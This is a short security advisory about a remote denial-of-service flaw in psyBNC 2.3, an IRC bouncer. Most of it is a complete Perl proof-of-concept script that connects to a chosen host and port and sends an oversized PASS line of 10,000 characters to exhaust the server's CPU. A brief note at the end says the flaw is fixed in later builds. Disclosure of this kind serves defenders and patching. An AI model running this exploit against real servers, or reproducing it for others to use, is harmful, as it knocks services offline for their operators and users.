COMMAND PsyBNC Remote Dos SYSTEMS AFFECTED Version 2.3 PROBLEM dvdman [http://www.l33tsecurity.com/] posted following proof of concept regarding a remote DoS consuming 100% CPU. psyBNC is an easy-to-use, multi-user, permanent IRC-Bouncer with many features. [http://www.psychoid.lam3rz.de/] Proof Of Concept ================ #!/usr/bin/perl #PsyBNC 2.3 Remote DDOS POC #By DVDMAN (DVDMAN@L33TSECURITY.COM) #WWW.L33TSECURITY.COM #L33T SECURITY use Getopt::Std; use IO::Socket; $|=1; my %options; getopt(\'Hhp\',\\%options); $arg2 = shift(@ARGV); $options{h} && usage(); if ($options{H}) { do_psy(); } if ($options{p}) { do_psy(); } else { usage(); } sub usage() { print(\"[L33TSECURITY] PsyBNC 2.3 Remote DDOS\\n\"); print(\" (C) DVDMAN \\n\\n\"); print(\"Usage: $0 [options]\\n\"); print(\"-H = hostname or ip REQUIRED\\n\"); print(\"-p = port of PSYBNC server REQUIRED\\n\"); } exit(1); sub do_psy() { my $test = $options{H}; my $test2 = $options{p}; $remote = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => $test, PeerPort => $test2, ); unless ($remote) { print\"error cannot connect\"; return } $remote->autoflush(1); print STDERR \"PsyBNC REMOTE DDOS BY DVDMAN\\n\"; print STDERR \" starting attack in 5 seconds...\\n\"; sleep(5); my $user = \"USER OWNED OWNED OWNED OWNED OWNED\\r\\n\"; my $nick = \"NICK OWNED\\r\\n\"; my $pw = \"PASS \" . \"A\"x10000; print $remote $user; print $remote $nick; print $remote $pw; print STDERR \"DONE\\n\"; die \"BYE\\n\"; } #By DVDMAN (DVDMAN@L33TSECURITY.COM) #WWW.L33TSECURITY.COM #L33T SECURITY SOLUTION Fixed in current available 2.3 release, and in current beta version (2.3.1).